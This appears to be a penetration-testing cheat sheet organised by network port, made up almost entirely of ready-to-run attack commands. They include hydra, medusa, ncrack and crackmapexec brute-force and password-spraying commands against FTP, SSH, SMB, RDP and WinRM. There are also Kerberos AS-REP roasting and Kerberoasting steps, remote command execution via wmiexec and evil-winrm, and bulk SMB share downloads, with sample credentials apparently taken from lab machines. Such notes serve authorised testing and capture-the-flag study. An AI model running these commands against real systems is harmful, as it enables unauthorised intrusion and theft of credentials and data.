- Port 21
- Port 22
- Port 25
- Port 80
- Port 88
- Port 110
- Port 111
- Port 139, 445
- Port 143
- Port 389
- Port 587
- Port 1433
- Port 2375
- Port 3389
- Port 5672
- Port 5985
- Port 11211
- Port 15672
nmap -sS -sV -vv -Pn -p<PORT> <IP>
nmap -T4 -sS -A -p- <IP>
nmap -T4 -sS -sC -p- -Pn <IP>
nmap -T4 -sUV <IP>
nmap -T4 -A -sUV --top-ports 1000 -Pn <IP>
ls -l /usr/share/nmap/scripts/smb*
masscan -p21,22,443,8000-8100 10.0.0.0/24
knockpy domain.com -w /usr/share/wordlists/list --silent csv -o /path/to/new/folder
usage: knockpy [-h] [-v] [--no-local] [--no-remote] [--no-scan] [--no-http]
[--no-http-code CODE [CODE ...]] [--dns DNS] [-w WORDLIST]
[-o FOLDER] [-t SEC] [-th NUM] [--silent [{False,json,json-pretty,csv}]]
domain
dirb http://10.0.0.1/abc/ /usr/share/wordlists/dirb/big.txt
.html,.php,.asp,.aspx,.htm,.xml,.json,.jsp,.pl,.ini,.bak,.bck.
gobuster dir -u http://10.0.0.1/ -w /usr/share/wordlists/dirb/common.txt -e -t 20
gobuster dir -u http://10.0.0.1/ -w /usr/share/wordlists/dirb/big.txt -t 30 -e -k -x .html,.php,.asp,.aspx,.htm,.xml,.json,.jsp,.pl
➤ Error: the server returns a status code that matches the provided options for non existing urls. https://10.0.0.1 => 200 (Length: 1474).
Solution - exclude the specific length : --exclude-length [size]
Example : gobuster -u http://10.0.0.1/ -w /usr/share/wordlists/dirb/common.txt -e -t 20 --exclude-length 1474
➤ Error: the server returns a status code that matches the provided options for non existing urls. https://10.0.0.1 => 401 (Length: 98).
Solution - exclude the 401 status code : -b 404,401
Example : gobuster -u http://10.0.0.1/ -w /usr/share/wordlists/dirb/common.txt -e -t 20 -b 404,401
gobuster fuzz -u http://10.0.0.1/user/FUZZ/condig -w /usr/share/wordlists/dirb/common.txt -e -t 20
nikto -host=http://example.com
https://dnsdumpster.com/
https://search.censys.io/
https://crt.sh/
https://archive.org/
https://www.robtex.com/
nmap -p 21 -sV -sC --script="ftp-vuln-*, ftp-anon" 10.0.0.1-254
#Hydra - Password spraying
hydra -s 21 -t 4 -L username.lst -p password01! 10.0.0.1 ftp
#Hydra - Bruteforce specific user
hydra -s 21 -t 4 -l admin -P /usr/share/wordlists/rockyou.txt 10.0.0.1 ftp
#Hydra - Bruteforce common login:passord
hydra -s 21 -C /home/kali/wordlists/legion/ftp-betterdefaultpasslist.txt -u -f 10.0.0.1 ftp
#Medusa
medusa -h 10.10.10.10 -u user -P passwords.txt -M ftp
➤ Connection
ftp 10.0.0.1 21
➤ Upload a file (from the folder where the shell has been started)
binary
put <filename>
➤ Download a file (to the folder where the shell has been started)
binary
get <filename>
➤ 229 Entering Extended Passive Mode (|||26826|)
#Hydra - Bruteforce specific user
hydra -s 22 -v -t 4 -l root -P /usr/share/wordlists/rockyou.txt 10.0.0.1 ssh
#Hydra - Password spraying
hydra -L user.txt -p password01! 10.0.0.1 ssh
#Hydra - Full bruteforce
hydra -L user.txt -P rockyou.txt 10.10.219.212 ssh
ssh lexis@10.0.0.1
ssh lexis@10.0.0.1 -oKexAlgorithms=+diffie-hellman-group1-sha1
ssh lexis@10.0.0.1
lexis@10.0.0.1's password:
Last login: Thu Feb 24 08:42:29 2022 from 192.168.1.1
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ E R R O R @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
The .bash_profile file for the server you are attempting to
connect to has encountered an error. This could mean that
your access has been disabled. Please contact a system
administrator to restore your access to this server.
Connection to 10.0.0.1
ssh -t lexis@10.0.0.1 /bin/sh
lexis@10.0.0.1's password:
sh-05$
chmod 600 id_rsa
ssh -i id_rsa kiosec@10.0.0.1
telnet 10.0.0.1 25
Trying 10.0.0.1
Connected to 10.0.0.1.
Escape character is '^]'.
220 mail.local ESMTP Postfix (Debian/GNU)
VRFY {username}
➤ Valid username
252 2.0.0 useradm
➤ Invalid username
550 5.1.1 <admin>: Recipient address rejected:User unknown in local recipient table
wpscan --url http://10.0.0.1/ --passwords /usr/share/wordlists/rockyou.txt --usernames admin --api-token {token-api}
Service : kerberos-sec Microsoft Windows Kerberos
# Install kerbrute : https://github.com/ropnop/kerbrute/releases
# Think to add the domain to the /etc/host -> echo '@IP @domain' >> /etc/hosts (example echo '10.0.0.1 cyberlab.local' >> /etc/hosts)
# Enumerate the user
root@kali:~# kerbrute userenum -d <domain_name> --dc <dns_domain_name> userlist.txt -t 100
Important note : Once a list of user founded, try to obtain the TGT ticket (ASREPPROASTING through GetNPusers.py)
# Password Spraying
root@kali:~# ./kerbrute_linux_amd64 passwordspray -d <domain_name> domain-users.txt Password123
rpcinfo -p 10.0.0.1
rpcclient -U "" 10.0.0.1
srvinfo
enumdomusers
getdompwinfo
querydominfo
netshareenum
netshareenumall
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.0.0.1
enum4linux -a 10.0.0.1
nmap -p 445,139 -Pn --script smb-protocols.nse 10.0.0.1
nmap -v -p 139,445 --script=smb-os-discovery 10.0.0.1
nmap -v -p 139,445 --script=smb* 10.0.0.1
nmap -p 445,139 -Pn --script=smb-vuln-*.nse 10.0.0.1 // Do not return all vuln because some script needs specific args
nmap -v -p 139,445 --script=smb-vuln-ms08-067 --script-args=unsafe=1 10.0.0.1
nmap --script smb-vuln-cve-2017-7494 --script-args smb-vuln-cve-2017-7494.check-version -p445 10.0.0.1
#Enumerate the shares
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.0.0.1
smbclient -L \\10.0.0.1
smbclient -L 10.0.0.1 -U anonymous
smbclient -L 10.0.0.1 --options='client min protocol=NT1'
smbclient \\\\10.10.155.41\\<share_name>
root@ip-10-10-148-27:~# smbclient \\\\10.10.155.41\\Users
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> dir
. DR 0 Fri Mar 12 02:11:49 2021
.. DR 0 Fri Mar 12 02:11:49 2021
Administrator D 0 Thu Mar 11 21:55:48 2021
All Users DHS 0 Sat Sep 15 08:28:48 2018
atlbitbucket D 0 Thu Mar 11 22:53:06 2021
<...>
smb: \> recurse on
smb: \> prompt off
smb: \> mget *
NT_STATUS_ACCESS_DENIED listing \Administrator\*
STATUS_STOPPED_ON_SYMLINK listing \All Users\*
STATUS_STOPPED_ON_SYMLINK listing \*
smb: \All Users\>
smbmap -H 10.0.0.1
➤ Reculsive enumeration
smbmap -H 10.0.0.1 -r
➤ Recursive enumeration on a specific folder
smbmap -H 10.0.0.1 -R 'Replication\active.htb'
➤ Authenticated enumeration
smbmap -H 10.0.0.1 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' -R
➤ Download a file
smbmap -H 10.10.0.1 --download '.\Users\SVC_TGS\Desktop\user.txt'
➤ If error ‘[!] Authentication error on 10.0.0.1’ try with a fake user -u ‘123’
smbmap -H 10.0.0.1 -R -u ‘123’
If the following error appear "protocol negotiation failed : NT_STATUS_CONNECTION_DISCONNECTED", it's probably due to the old smb version of the victim.
Solution: Intercept the trafic of the command ‘smbclient -L \\<IP> with wireshark and search the negotiation of the smb version.
smb://<ip>/<folder>
#Example with the folder named anonymous
smbget -R smb://10.0.0.1/anonymous
#Example with a specific file
smbget -r smb://10.0.0.1/folder/file
press enter
mount -t cifs //10.0.0.1/share /mnt/share
mount -t cifs -o "username=user,password=password" //10.0.0.1/share /mnt/share
hydra -L users.txt -P passs.txt smb://10.0.0.1 -t 4
hydra -L username.txt -P password.txt 10.0.0.1 smb -V
crackmapexec smb <IP> -d <DOMAIN> -u users.txt -p 'PASSWORD'
→ EX: crackmapexec smb 10.0.0.1 -d frabricorp -u users.txt -p '123Soleil'
STATUS_PASSWORD_MUST_CHANGE : correct password but has expired and needs to be changed before logging in
STATUS_LOGIN_FAILURE : incorrect password
➤ Anonymous connection attempt (-x). With the example test.com : DOMAIN = test and DOMAIN2 = com
ldapsearch -h 10.129.136.235 -p 389 -x -b "dc=htb,dc=local"
➤ Enumerate all AD users (https://github.com/ropnop/windapsearch)
./windapsearch.py -d test.com --dc-ip 10.0.0.1 -U
➤ Enumerate all objects in the domain
./windapsearch.py -d test.com --dc-ip 10.0.0.1 --custom "objectClass=*"
CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local
The service alfresco needs Kerberos pre-authentication to be disabled. This means that we can request the encrypted TGT for this user.
➤ Request a TGT ticket
./GetNPUsers.py DOMAIN/USERNAME -dc-ip <IP> -no-pass
➤ Next steps: Crack the obtained TGT ticket then used is again port 5985 using evil-winrm
➤ Authenticated research. With the example test.com : DOMAIN = test and DOMAIN2 = com
ldapsearch -x -h <IP> -p <PORT> -D 'USERNAME' -w 'PASSWORD' -b "dc=DOMAIN,dc=DOMAIN2" -s sub"(&(objectCategory=person)(objectClass=user)(!(useraccountcontrol:1.2.840.113556.1.4.803:=2)))" samaccountname | grep sAMAccountName
OR
./GetADUsers.py -all DOMAIN/USERNAME -dc-ip <IP>
→ EX: ./GetADUsers.py -all domain.com/svc_tgs -dc-ip 10.0.0.1
OR
windapsearch.py -u "DOMAIN\USERNAME" --dc-ip <IP> -U
→ EX: ./windapsearch.py -u "FABRICORP\harry" --dc-ip 10.10.10.193 -U
➤ Verify if a SPN exist
ldapsearch -x -h 10.0.0.1 -p 389 -D 'SVC_TGS' -w'password' -b "dc=domain,dc=com" -s sub"(&(objectCategory=person)(objectClass=user)(!(useraccountcontrol:1.2.840.113556.1.4.803:=2))(serviceprincipalname=*/*))" serviceprincipalname | grep -B 1 servicePrincipalName
OR
./GetUserSPNs.py DOMAIN/USERNAME -dc-ip <IP>
→ EX: ./GetUserSPNs.py domain.com/svc_tgs -dc-ip 10.0.0.1
→ OUTPUT: active/CIFS:445 -> a SPN exist
➤ Request a SPN token
./GetUserSPNs.py DOMAIN/USERNAME -dc-ip <IP> -request
→ EX: ./GetUserSPNs.py domain.com/svc_tgs -dc-ip 10.0.0.1 -request
➤ Wmiexec equivalent to psexec
./wmiexec.py <DOMAIN>/<USER>:<PASSWORD>@<IP>
→ EX: ./wmiexec.py domain.com/administrator:password@10.0.0.1
sqsh -U sa -P password -S 10.0.0.1:1433 -D mydb
go -m pretty
Default docker port
nmap -sV -p 2375 10.0.0.1
curl http://10.0.0.1:2375/version
{
"Platform": {
"Name": "Docker Engine - Community"
},
"Components": [
{
"Name": "Engine",
"Version": "20.10.20",
"Details": {
"ApiVersion": "1.41",
"Arch": "amd64",
"BuildTime": "2022-10-18T18:18:12.000000000+00:00",
"Experimental": "false",
"GitCommit": "03df974",
"GoVersion": "go1.18.7",
"KernelVersion": "5.15.0-1022-aws",
"MinAPIVersion": "1.12",
"Os": "linux"
}]
}
# To test if we can run commands, we'll list the containers on the target
docker -H tcp://10.0.0.1:2375 ps
nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 10.0.0.1
hydra -L user.txt -P pass.txt 10.0.0.1 rdp
ncrack -vv --user administrator -P passwords.txt rdp://10.0.0.1,CL=1
rdesktop 10.0.0.1
rdesktop -u <username> <IP>
rdesktop -d <domain> -u <username> -p <password> <IP>
nmap -sV -Pn -n -T4 -p 5672 --script amqp-info 10.0.0.1
import amqp
conn = amqp.connection.Connection(host="10.0.0.1", port=5672, virtual_host="/")
conn.connect()
for k,v in conn.server_properties.items():
print(k,v)
Details : https://book.hacktricks.xyz/network-services-pentesting/5985-5986-pentesting-winrm
#Brute force
crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
#Check a pair of credentials (Password) and execute a command
crackmapexec winrm <IP> -d <Domain Name> -u <username> -p <password> -x "whoami"
# Check a pair of credentials (Hash) and execute a PS command
crackmapexec winrm <IP> -d <Domain Name> -u <username> -H <HASH> -X '$PSVersionTable'
https://github.com/Hackplayers/evil-winrm
ruby evil-winrm.rb -i <IP> -u <USERNAME> -p <PASSWORD>
OR
gem evil-winrm
evil-winrm -i <IP> -u <USERNAME> -p <PASSWORD>
nmap -n -sV --script memcached-info -p 11211 10.0.0.1
echo "version" | nc -vn -w 1 <IP> 11211 #Get version
echo "stats" | nc -vn -w 1 <IP> 11211 #Get status
echo "stats slabs" | nc -vn -w 1 <IP> 11211 #Get slabs
echo "stats items" | nc -vn -w 1 <IP> 11211 #Get items of slabs with info
echo "stats cachedump <number> 0" | nc -vn -w 1 <IP> 11211 #Get key names (the 0 is for unlimited output size)
echo "get <item_name>" | nc -vn -w 1 <IP> 11211 #Get saved info
➤ Install and use memcdump
mencdump --verbose --debug --servers=10.0.0.1 | tee keys.lst
➤ Execute the script
#!/bin/bash
file="keys.lst" #file which contains the keys
while read -r line
do
echo "get $line | nc -vn -w 1 10.0.0.1 112111 > $line.txt
done < $file
The default credentials are guest:guest